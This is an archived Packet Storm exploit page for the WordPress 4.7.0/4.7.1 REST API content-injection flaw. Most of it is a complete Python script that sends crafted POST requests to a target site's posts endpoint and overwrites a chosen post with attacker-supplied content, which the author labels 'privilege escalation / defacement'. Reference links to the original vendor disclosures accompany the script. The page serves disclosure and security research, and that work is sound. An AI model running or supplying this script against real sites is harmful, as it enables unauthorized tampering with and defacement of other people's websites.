exploit the possibilities

WordPress 4.7.0 / 4.7.1 REST API Privilege Escalation

WordPress 4.7.0 / 4.7.1 REST API Privilege Escalation
Posted Feb 2, 2017
Authored by Dustin Warren

WordPress versions 4.7.0 and 4.7.1 REST API post privilege escalation and defacement exploit. Originally vulnerability discovered by Sucuri's research team.

tags | exploit
MD5 | 0bf4eb01dd13b6e3105ee9871200769a

WordPress 4.7.0 / 4.7.1 REST API Privilege Escalation

Change Mirror Download
#!/usr/bin/env python
'''
WordPress 4.7.0-4.7.1 REST API Post privilege escalation / defacement exploit

@dustyfresh
Date: 02-01-2017

Original vuln disclosed by Sucuri's research team

Reference:
https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
https://wpvulndb.com/vulnerabilities/8734
https://blogs.akamai.com/2017/02/wordpress-web-api-vulnerability.html
https://blog.cloudflare.com/protecting-everyone-from-wordpress-content-injection/
'''
import requests
from fake_useragent import UserAgent
import argparse
import urllib.parse
import random
import string

def attack(target, postID, payload):
ua = { 'user-agent': UserAgent().random }
uwotm8 = ''.join([random.choice(string.ascii_letters) for n in range(8)])
sploit_api = 'http://{}/index.php?rest_route=/wp/v2/posts/{}&id={}{}&content={}'.format(target, postID, postID, uwotm8, payload)
attack = requests.post(sploit_api, data = {}, headers=ua, verify=False)
if attack.status_code == 200:
print('Payload sent to {} with 200 status'.format(target))
else:
print('Payload sent to {}, but we are not sure if the attack was successful as {} was the response'.format(target, attack.status_code))


if __name__ == '__main__':
parser = argparse.ArgumentParser(description='WordPress 4.7.0-4.7.1 REST API Post privilege escalation / defacement exploit')
parser.add_argument('--target', '-t', type=str, required=True, help='Post ID in which the payload will be applied')
parser.add_argument('--postID', '-pid', type=str, required=True, help='Post ID in which the payload will be applied')
parser.add_argument('--payload', '-p', type=str, required=True, help='What you would like to replace the post with')

args = parser.parse_args()
target = args.target
postID = args.postID
payload = urllib.parse.quote_plus(args.payload)
attack(target, postID, payload)

Login or Register to add favorites

File Archive:

August 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    3 Files
  • 2
    Aug 2nd
    2 Files
  • 3
    Aug 3rd
    32 Files
  • 4
    Aug 4th
    22 Files
  • 5
    Aug 5th
    12 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close